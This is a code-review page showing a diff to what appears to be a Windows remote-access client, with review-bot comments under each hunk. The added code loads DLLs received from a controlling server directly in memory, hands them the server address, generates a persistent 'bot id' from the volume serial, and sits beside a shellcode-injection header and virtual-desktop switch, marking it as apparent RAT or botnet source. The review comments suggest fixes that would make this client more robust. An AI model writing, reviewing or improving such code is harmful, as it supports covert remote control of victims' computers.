Reserve for running customized module in future
@@ -103,7 +103,7 @@ DWORD WINAPI ThreadProc(LPVOID lParam)
|
||||
template <class Manager, int n> DWORD WINAPI LoopManager(LPVOID lParam)
|
||||
{
|
||||
ThreadInfo *pInfo = (ThreadInfo *)lParam;
|
||||
IOCPClient *ClientObject = pInfo->p;
|
||||
IOCPClient *ClientObject = (IOCPClient *)pInfo->p;
|
||||
CONNECT_ADDRESS& g_SETTINGS(*(pInfo->conn));
|
||||
if (ClientObject->ConnectServer(g_SETTINGS.ServerIP(), g_SETTINGS.ServerPort()))
|
||||
{
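Review bot: The cast added in `IOCPClient *ClientObject = (IOCPClient *)pInfo->p;` is a no-op if `ThreadInfo::p` is still declared as `IOCPClient *p` (the only ThreadInfo definition visible on this page declares it that way), and a C-style cast there will also silently accept any later change of `p` to an unrelated pointer type. If the cast is being added because `p` is about to become `void*`, prefer `static_cast<IOCPClient *>(pInfo->p)` so incompatible types are still rejected at compile time. `ClientObject` is dereferenced on the next visible line without a null check, which is pre-existing; LoopManager's body continues outside the hunk.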
|
||||
|
||||
@@ -12,6 +12,7 @@
|
||||
#define ALGORITHM_GRAY 0
|
||||
#define ALGORITHM_DIFF 1
|
||||
#define ALGORITHM_H264 2
|
||||
#define ALGORITHM_HOME 3
|
||||
|
||||
#define MAX_CURSOR_TYPE 16
|
||||
|
||||
|
||||
@@ -10,6 +10,7 @@
|
||||
#include <corecrt_io.h>
|
||||
#include "ClientDll.h"
|
||||
#include "MemoryModule.h"
|
||||
#include "common/dllRunner.h"
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
// Construction/Destruction
|
||||
@@ -61,20 +62,16 @@ UINT CKernelManager::GetAvailableIndex() {
|
||||
return -1;
|
||||
}
|
||||
|
||||
BOOL WriteBinaryToFile(const char* data, ULONGLONG size)
|
||||
BOOL WriteBinaryToFile(const char* data, ULONGLONG size, const char* name = "ServerDll.new")
|
||||
{
|
||||
if (size > 32 * 1024 * 1024) {
|
||||
Mprintf("WriteBinaryToFile fail: too large file size!!\n");
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
char path[_MAX_PATH], * p = path;
|
||||
GetModuleFileNameA(NULL, path, sizeof(path));
|
||||
while (*p) ++p;
|
||||
while ('\\' != *p) --p;
|
||||
strcpy(p + 1, "ServerDll.new");
|
||||
if (_access(path, 0)!=-1)
|
||||
strcpy(p + 1, name);
|
||||
if (_access(path, 0) != -1)
|
||||
{
|
||||
if (std::string("ServerDll.new")!=name) return TRUE;
|
||||
DeleteFileA(path);
|
||||
}
|
||||
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ģʽд<CABD><D0B4>
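Review bot: `strcpy(p + 1, name);` copies a caller-supplied `name` into the fixed `path[_MAX_PATH]` buffer with no length check, and the new parameter lets that name come from `info.Name` in ExecuteDLLProc, which originates in a received packet; a name longer than the remaining space overruns the stack buffer, and a name containing `\\` or `..` writes outside the module directory. Guard before the copy, e.g. `if (!name || strpbrk(name, "\\/:") || strlen(name) >= sizeof(path) - (size_t)(p + 1 - path)) return FALSE;`. The added `if (std::string("ServerDll.new") != name) return TRUE;` reports success without writing anything when a file of that name already exists, so callers cannot distinguish a skipped write from a completed one; returning FALSE, or documenting the skip in the function comment, would be clearer. The pre-existing `while ('\\' != *p) --p;` walks below `path` if GetModuleFileNameA fails or yields a path without a separator. WriteBinaryToFile's body continues outside the hunk.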
|
||||
@@ -113,11 +110,10 @@ BOOL WriteBinaryToFile(const char* data, ULONGLONG size)
|
||||
|
||||
typedef struct DllExecParam
|
||||
{
|
||||
State& exit;
|
||||
DllExecuteInfo info;
|
||||
PluginParam param;
|
||||
BYTE* buffer;
|
||||
DllExecParam(const DllExecuteInfo* dll, BYTE* data, State& status) : exit(status) {
|
||||
memcpy(&info, dll, sizeof(DllExecuteInfo));
|
||||
DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data) : info(dll), param(arg) {
|
||||
buffer = new BYTE[info.Size];
|
||||
memcpy(buffer, data, info.Size);
|
||||
}
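Review bot: The new constructor `DllExecParam(const DllExecuteInfo& dll, const PluginParam& arg, BYTE* data)` sizes both the allocation and the `memcpy` from `info.Size`, a field copied from the incoming packet, while the only check that `data` really holds that many bytes lives in the caller (OnReceive compares `info->Size` with `ulLength - sz`). Either take the source length as a fourth argument and reject a mismatch here, or state the precondition on the constructor: `// Precondition: data points to at least info.Size readable bytes; the caller has validated this against the packet length.` The raw `new BYTE[info.Size]` pairs with whatever the destructor does outside this hunk; `std::vector<BYTE>` or `std::unique_ptr<BYTE[]>` would make the ownership explicit and remove the manual delete. The struct definition continues outside the hunk.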
|
||||
@@ -126,32 +122,64 @@ typedef struct DllExecParam
|
||||
}
|
||||
}DllExecParam;
|
||||
|
||||
|
||||
class MemoryDllRunner : public DllRunner {
|
||||
protected:
|
||||
HMEMORYMODULE m_mod;
|
||||
public:
|
||||
MemoryDllRunner() : m_mod(nullptr) {}
|
||||
virtual void* LoadLibraryA(const char* data, int size) {
|
||||
return (m_mod = ::MemoryLoadLibrary(data, size));
|
||||
}
|
||||
virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) {
|
||||
return ::MemoryGetProcAddress((HMEMORYMODULE)mod, lpProcName);
|
||||
}
|
||||
virtual BOOL FreeLibrary(void* mod) {
|
||||
::MemoryFreeLibrary((HMEMORYMODULE)mod);
|
||||
return TRUE;
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
DWORD WINAPI ExecuteDLLProc(LPVOID param) {
|
||||
DllExecParam* dll = (DllExecParam*)param;
|
||||
HMEMORYMODULE module = MemoryLoadLibrary(dll->buffer, dll->info.Size);
|
||||
DllExecuteInfo info = dll->info;
|
||||
PluginParam pThread = dll->param;
|
||||
#ifdef _DEBUG
|
||||
WriteBinaryToFile((char*)dll->buffer, info.Size, info.Name);
|
||||
DllRunner* runner = new DefaultDllRunner(info.Name);
|
||||
#else
|
||||
DllRunner* runner = new MemoryDllRunner();
|
||||
#endif
|
||||
HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size);
|
||||
if (module) {
|
||||
DllExecuteInfo info = dll->info;
|
||||
if (info.Func[0]) {
|
||||
FARPROC proc = MemoryGetProcAddress(module, info.Func);
|
||||
if (proc) {
|
||||
switch (info.CallType)
|
||||
{
|
||||
case CALLTYPE_DEFAULT:
|
||||
((CallTypeDefault)proc)();
|
||||
break;
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
else { // û<><C3BB>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB><EFBFBD><EFBFBD>DLL
|
||||
while (S_CLIENT_EXIT != dll->exit) {
|
||||
switch (info.CallType)
|
||||
{
|
||||
case CALLTYPE_DEFAULT:
|
||||
while (S_CLIENT_EXIT != *pThread.Exit)
|
||||
Sleep(1000);
|
||||
break;
|
||||
case CALLTYPE_IOCPTHREAD: {
|
||||
PTHREAD_START_ROUTINE proc = (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run");
|
||||
Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
|
||||
if (proc) {
|
||||
proc(&pThread);
|
||||
}else {
|
||||
while (S_CLIENT_EXIT != *pThread.Exit)
|
||||
Sleep(1000);
|
||||
}
|
||||
break;
|
||||
}
|
||||
MemoryFreeLibrary(module);
|
||||
default:
|
||||
break;
|
||||
}
|
||||
runner->FreeLibrary(module);
|
||||
}
|
||||
else {
|
||||
Mprintf("MemoryLoadLibrary '%s' failed\n", info.Name);
|
||||
}
|
||||
SAFE_DELETE(dll);
|
||||
SAFE_DELETE(runner);
|
||||
return 0x20250529;
|
||||
}
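Review bot: `SAFE_DELETE(runner)` deletes a `MemoryDllRunner` or `DefaultDllRunner` through a `DllRunner*`, and the `DllRunner` definition visible on this page (the block removed from the other file) declares no virtual destructor; if the copy in `common/dllRunner.h` matches, that delete is undefined behaviour — add `virtual ~DllRunner() = default;` to the base. The new `MemoryDllRunner` overrides (`LoadLibraryA`, `GetProcAddress`, `FreeLibrary`) should be marked `override`, so a signature drift against the base (compare the `(const char* path, int len=0)` form in the last hunk) becomes a compile error instead of a silently hidden overload; `std::unique_ptr<DllRunner>` in place of `new`/`SAFE_DELETE` would also cover every exit path. The log line `Mprintf("MemoryGetProcAddress '%s' %s\n", ...)` now runs for both runners and therefore misreports the debug build; `"GetProcAddress '%s' %s\n"` would be accurate. `runner->FreeLibrary(module)` runs as soon as `run` returns, so a plugin that leaves threads or callbacks alive in the unmapped image may fault the process — worth stating in a comment if that is the plugin contract.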
|
||||
|
||||
@@ -160,21 +188,24 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
|
||||
bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT;
|
||||
if ((m_ulThreadCount = GetAvailableIndex()) == -1 && !isExit) {
|
||||
return Mprintf("CKernelManager: The number of threads exceeds the limit.\n");
|
||||
} else if (!isExit){
|
||||
}
|
||||
else if (!isExit) {
|
||||
m_hThread[m_ulThreadCount].p = nullptr;
|
||||
m_hThread[m_ulThreadCount].conn = m_conn;
|
||||
}
|
||||
|
||||
switch(szBuffer[0])
|
||||
switch (szBuffer[0])
|
||||
{
|
||||
case CMD_EXECUTE_DLL: {
|
||||
#ifdef _WIN64
|
||||
const int sz = 1 + sizeof(DllExecuteInfo);
|
||||
if (ulLength <= sz)break;
|
||||
DllExecuteInfo* info = (DllExecuteInfo*)(szBuffer + 1);
|
||||
if (info->Size == ulLength - sz)
|
||||
CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(info, szBuffer + sz, g_bExit), 0, NULL));
|
||||
Mprintf("Execute '%s'%s succeed: %d Length: %d\n", info->Name, info->Func, szBuffer[1], info->Size);
|
||||
if (info->Size == ulLength - sz && info->RunType == MEMORYDLL) {
|
||||
PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit);
|
||||
CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL));
|
||||
Mprintf("Execute '%s'%d succeed: %d Length: %d\n", info->Name, info->CallType, szBuffer[1], info->Size);
|
||||
}
|
||||
#endif
|
||||
break;
|
||||
}
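Review bot: `CloseHandle(CreateThread(NULL, 0, ExecuteDLLProc, new DllExecParam(*info, param, szBuffer + sz), 0, NULL));` leaks the freshly allocated `DllExecParam` (and its copied buffer) whenever CreateThread returns NULL, because nothing else owns it; split it as `DllExecParam* arg = new DllExecParam(*info, param, szBuffer + sz);` / `HANDLE h = CreateThread(NULL, 0, ExecuteDLLProc, arg, 0, NULL);` / `if (h) CloseHandle(h); else delete arg;`. The new log line passes `info->Name` to `%s` straight out of the received buffer; if `Name` is a fixed-size array without a guaranteed terminator, terminate it before logging or bound the read with `%.*s` and `(int)sizeof(info->Name)`. `PluginParam param(m_conn->ServerIP(), m_conn->ServerPort(), &g_bExit);` dereferences `m_conn`, which the lines above assign into the thread slot without a null check; whether it can be null is not visible here. `info->Size == ulLength - sz` is the exact bound the memcpy in DllExecParam relies on, so a one-line comment saying so would help the next reader. OnReceive's body continues outside the hunk.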
|
||||
|
||||
@@ -72,17 +72,6 @@ private:
|
||||
}
|
||||
};
|
||||
|
||||
// <20>߳<EFBFBD><DFB3><EFBFBD>Ϣ<EFBFBD>ṹ<EFBFBD><E1B9B9>, <20><><EFBFBD><EFBFBD>3<EFBFBD><33><EFBFBD><EFBFBD>Ա: <20><><EFBFBD><EFBFBD>״̬(run)<29><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(h)<29><>ͨѶ<CDA8>ͻ<EFBFBD><CDBB><EFBFBD>(p).
|
||||
struct ThreadInfo
|
||||
{
|
||||
BOOL run;
|
||||
HANDLE h;
|
||||
IOCPClient *p;
|
||||
void* user;
|
||||
CONNECT_ADDRESS* conn;
|
||||
ThreadInfo() : run(TRUE), h(NULL), p(NULL), user(nullptr), conn(nullptr){ }
|
||||
};
|
||||
|
||||
class CKernelManager : public CManager
|
||||
{
|
||||
public:
|
||||
|
||||
@@ -14,7 +14,7 @@ typedef struct {
|
||||
HANDLE hEventTransferArg;
|
||||
} THREAD_ARGLIST, * LPTHREAD_ARGLIST;
|
||||
|
||||
BOOL SelectDesktop(TCHAR* name);
|
||||
HDESK SelectDesktop(TCHAR* name);
|
||||
|
||||
unsigned int __stdcall ThreadLoader(LPVOID param)
|
||||
{
|
||||
@@ -54,6 +54,41 @@ HANDLE MyCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD
|
||||
return hThread;
|
||||
}
|
||||
|
||||
ULONG PseudoRand(ULONG* seed)
|
||||
{
|
||||
return (*seed = 1352459 * (*seed) + 2529004207);
|
||||
}
|
||||
|
||||
std::string GetBotId()
|
||||
{
|
||||
#define _T(p) p
|
||||
TCHAR botId[35] = { 0 };
|
||||
TCHAR windowsDirectory[MAX_PATH] = {};
|
||||
TCHAR volumeName[8] = { 0 };
|
||||
DWORD seed = 0;
|
||||
|
||||
if (GetWindowsDirectory(windowsDirectory, sizeof(windowsDirectory)))
|
||||
windowsDirectory[0] = _T('C');
|
||||
|
||||
volumeName[0] = windowsDirectory[0];
|
||||
volumeName[1] = _T(':');
|
||||
volumeName[2] = _T('\\');
|
||||
volumeName[3] = _T('\0');
|
||||
|
||||
GetVolumeInformation(volumeName, NULL, 0, &seed, 0, NULL, NULL, 0);
|
||||
|
||||
GUID guid = {};
|
||||
guid.Data1 = PseudoRand(&seed);
|
||||
|
||||
guid.Data2 = (USHORT)PseudoRand(&seed);
|
||||
guid.Data3 = (USHORT)PseudoRand(&seed);
|
||||
for (int i = 0; i < 8; i++)
|
||||
guid.Data4[i] = (UCHAR)PseudoRand(&seed);
|
||||
wsprintf(botId, _T("%08lX%04lX%lu"), guid.Data1, guid.Data3, *(ULONG*)&guid.Data4[2]);
|
||||
return botId;
|
||||
#undef _T(p)
|
||||
}
|
||||
|
||||
BOOL SelectHDESK(HDESK new_desktop)
|
||||
{
|
||||
HDESK old_desktop = GetThreadDesktop(GetCurrentThreadId());
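Review bot: `#undef _T(p)` at the end of GetBotId is not a valid undef directive (only an identifier may follow `#undef`; compilers warn about the extra tokens and the macro stays defined), and the `#define _T(p) p` above it redefines the `_T` macro that `<tchar.h>` provides, changing its meaning for every later use in this translation unit; write `#undef _T` or, better, drop the local macro and use `TCHAR`/`TEXT()` consistently. `if (GetWindowsDirectory(windowsDirectory, sizeof(windowsDirectory))) windowsDirectory[0] = _T('C');` looks inverted — on success it overwrites the real drive letter with `C`, and on failure the buffer stays empty so `volumeName` becomes an empty string; `if (!GetWindowsDirectory(windowsDirectory, MAX_PATH))` would make `C` the fallback, and the size argument is in TCHARs, so `sizeof` over-reports it when TCHAR is `wchar_t`. `*(ULONG*)&guid.Data4[2]` reads four bytes through a misaligned pointer; `ULONG tail; memcpy(&tail, &guid.Data4[2], sizeof tail);` is the portable form. `GetVolumeInformation`'s return value is ignored, so on failure the id is derived from `seed == 0`, which may be intended but deserves a comment.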
|
||||
@@ -80,9 +115,9 @@ BOOL SelectHDESK(HDESK new_desktop)
|
||||
// Switches the current thread into a different desktop, by name
|
||||
// Calling with a valid desktop name will place the thread in that desktop.
|
||||
// Calling with a NULL name will place the thread in the current input desktop.
|
||||
BOOL SelectDesktop(TCHAR* name)
|
||||
HDESK SelectDesktop(TCHAR* name)
|
||||
{
|
||||
HDESK desktop;
|
||||
HDESK desktop = NULL;
|
||||
|
||||
if (name != NULL) {
|
||||
// Attempt to open the named desktop
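Review bot: The header comment above `HDESK SelectDesktop(TCHAR* name)` still describes the old BOOL contract and says nothing about the handle the function now hands back, which the caller must release with `CloseDesktop`; add a line such as `// Returns the desktop handle now in use (caller owns it and must CloseDesktop it), or NULL on failure.` The matching return changes (`return NULL;` / `return desktop;`) are in the next hunk. Existing callers written as `if (SelectDesktop(name))` keep compiling because the pointer converts to bool, but any `== TRUE` comparison now silently fails, so the call sites deserve a look. SelectDesktop's body continues outside the hunk.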
|
||||
@@ -103,18 +138,18 @@ BOOL SelectDesktop(TCHAR* name)
|
||||
|
||||
// Did we succeed?
|
||||
if (desktop == NULL) {
|
||||
return FALSE;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
// Switch to the new desktop
|
||||
if (!SelectHDESK(desktop)) {
|
||||
// Failed to enter the new desktop, so free it!
|
||||
CloseDesktop(desktop);
|
||||
return FALSE;
|
||||
return NULL;
|
||||
}
|
||||
|
||||
// We successfully switched desktops!
|
||||
return TRUE;
|
||||
return desktop;
|
||||
}
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
@@ -123,6 +158,7 @@ BOOL SelectDesktop(TCHAR* name)
|
||||
|
||||
CManager::CManager(IOCPClient* ClientObject) : g_bExit(ClientObject->g_bExit)
|
||||
{
|
||||
m_bReady = TRUE;
|
||||
m_ClientObject = ClientObject;
|
||||
m_ClientObject->setManagerCallBack(this, IOCPManager::DataProcess);
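Review bot: `m_bReady = TRUE;` is assigned in the constructor body after the member-initializer list has already run; initialise it in the list (`: g_bExit(ClientObject->g_bExit), m_bReady(TRUE)`) or, since the header hunk adds the member, give it a default member initializer `BOOL m_bReady = TRUE;` and drop the assignment. The same header adds `virtual void SetReady(BOOL ready = true)`, which mixes a `bool` literal into a `BOOL` parameter; `TRUE` keeps the type consistent. If `m_bReady` is read on the callback thread installed by `setManagerCallBack` while another thread calls `SetReady`, the flag needs to be atomic or guarded — not determinable from this hunk. The constructor body continues outside the hunk.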
|
||||
|
||||
|
||||
@@ -12,6 +12,12 @@
|
||||
#include "..\common\commands.h"
|
||||
#include "IOCPClient.h"
|
||||
|
||||
#define ENABLE_VSCREEN 1
|
||||
|
||||
HDESK SelectDesktop(TCHAR* name);
|
||||
|
||||
std::string GetBotId();
|
||||
|
||||
typedef IOCPClient CClientSocket;
|
||||
|
||||
typedef IOCPClient ISocketBase;
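Review bot: `std::string GetBotId();` introduces `std::string` into this header, and no `<string>` include is visible in the hunk; if the header currently compiles only through a transitive include, add `#include <string>` next to the other includes so that translation units including it in a different order still build. `#define ENABLE_VSCREEN 1` is a new unscoped macro with no comment; a line such as `// Compile-time switch for the virtual-screen path` (or an `inline constexpr bool`) would tell readers what it gates. The includes above this hunk are not visible.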
|
||||
@@ -27,6 +33,7 @@ class CManager : public IOCPManager
|
||||
{
|
||||
public:
|
||||
State&g_bExit; // 1-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 2-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD>
|
||||
BOOL m_bReady;
|
||||
CManager(IOCPClient* ClientObject);
|
||||
virtual ~CManager();
|
||||
|
||||
@@ -37,6 +44,7 @@ public:
|
||||
VOID NotifyDialogIsOpen();
|
||||
|
||||
int Send(LPBYTE lpData, UINT nSize);
|
||||
virtual void SetReady(BOOL ready = true) { m_bReady = ready; }
|
||||
};
|
||||
|
||||
#endif // !defined(AFX_MANAGER_H__32F1A4B3_8EA6_40C5_B1DF_E469F03FEC30__INCLUDED_)
|
||||
|
||||
@@ -4,6 +4,7 @@
|
||||
#include "ShellcodeInj.h"
|
||||
#include <WS2tcpip.h>
|
||||
#include <common/commands.h>
|
||||
#include "common/dllRunner.h"
|
||||
#pragma comment(lib, "ws2_32.lib")
|
||||
|
||||
// <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
|
||||
@@ -113,32 +114,6 @@ typedef struct PkgHeader {
|
||||
}
|
||||
}PkgHeader;
|
||||
|
||||
// A DLL runner.
|
||||
class DllRunner {
|
||||
public:
|
||||
virtual void* LoadLibraryA(const char* path) = 0;
|
||||
virtual FARPROC GetProcAddress(void* mod, const char* lpProcName) = 0;
|
||||
virtual BOOL FreeLibrary(void* mod) = 0;
|
||||
};
|
||||
|
||||
// Default DLL runner.
|
||||
class DefaultDllRunner : public DllRunner {
|
||||
private:
|
||||
HMODULE m_mod;
|
||||
public:
|
||||
DefaultDllRunner() : m_mod(nullptr) {}
|
||||
// Load DLL from the disk.
|
||||
virtual void* LoadLibraryA(const char* path) {
|
||||
return m_mod = ::LoadLibraryA(path);
|
||||
}
|
||||
virtual FARPROC GetProcAddress(void *mod, const char* lpProcName) {
|
||||
return ::GetProcAddress(m_mod, lpProcName);
|
||||
}
|
||||
virtual BOOL FreeLibrary(void* mod) {
|
||||
return ::FreeLibrary(m_mod);
|
||||
}
|
||||
};
|
||||
|
||||
// Memory DLL runner.
|
||||
class MemoryDllRunner : public DllRunner {
|
||||
protected:
|
||||
@@ -239,7 +214,7 @@ public:
|
||||
return buffer;
|
||||
}
|
||||
// Request DLL from the master.
|
||||
virtual void* LoadLibraryA(const char* path) {
|
||||
virtual void* LoadLibraryA(const char* path, int len=0) {
|
||||
int size = 0;
|
||||
auto buffer = ReceiveDll(size);
|
||||
if (nullptr == buffer)
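Review bot: The new signature `virtual void* LoadLibraryA(const char* path, int len=0)` puts a default argument on a virtual function; default arguments bind statically to the declaration the call is made through, so a caller holding a `DllRunner*` gets the base declaration's default (or none), not this one. Keep the parameter list identical to the base and add `override` — `virtual void* LoadLibraryA(const char* path, int len) override {` — so a mismatch with `MemoryDllRunner::LoadLibraryA(const char* data, int size)` in the other file becomes a compile error. `len` is not used in the visible body, which obtains its size from `ReceiveDll(size)`; spell it `int /*len*/` or mark it `[[maybe_unused]]` to say so. The base class in `common/dllRunner.h` is not visible here, and the function body continues outside the hunk.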
|
||||
|
||||